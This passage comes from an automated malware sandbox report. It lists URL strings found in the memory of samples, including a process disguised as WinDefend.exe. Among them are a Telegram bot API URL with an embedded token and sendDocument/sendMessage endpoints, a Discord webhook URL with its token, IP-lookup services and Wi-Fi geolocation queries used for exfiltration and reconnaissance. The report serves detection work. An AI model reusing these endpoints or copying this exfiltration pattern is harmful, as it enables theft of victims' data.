00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org0
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: WinDefend.exe, 00000004.00000002.3430651015.000000000B845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000030.00000002.2300634583.0000013E8BBD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: 77EC63BDA74BD0D0E0426DC8F80085060.21.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Loader.exe, 00000014.00000002.2747981173.000000001B58A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab/
Source: Loaader.exe, 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab6
Source: Loaader.exe, 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en89n
Source: Loader.exe, 00000014.00000002.2521881734.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ene089
Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000032B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: Loaader.exe, 00000015.00000002.3282228143.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: Loaader.exe, 00000015.00000002.3282228143.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000019.00000002.2776917070.0000015CD05B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2776917070.0000015CD06F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19F09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19DC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DB9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2527964251.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2270356962.0000015CC054B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019133BD1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A09D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8D9E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.30.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000030.00000002.3074256391.0000013EA5BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000019.00000002.2270356962.0000015CC054B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019133BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A09D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8D9E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikPX
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031AB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031AB000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003246000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: Loaader.exe, 00000015.00000002.3282228143.000000000372A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.p
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003522000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003549000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDoc
Source: WinDefend.exe, 00000004.00000002.3288846438.000000000324E000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003045000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003076000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000030C6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003018000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003549000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003208000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003098000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003064000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003034000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EDF000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E0C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocumentT
Source: WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendM
Source: WinDefend.exe, 00000004.00000002.3288846438.000000000324E000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003076000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000328A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000030C6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003018000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage
Source: WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000328A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003098000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003064000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003034000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EDF000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003279000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessageT
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bott-
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003496000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000320E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgD
Source: WinDefend.exe, 0000001F.00000002.3288810827.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgn
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/
Source: WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/t
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org3
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Loader.exe, 00000014.00000002.2527964251.00000000029E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
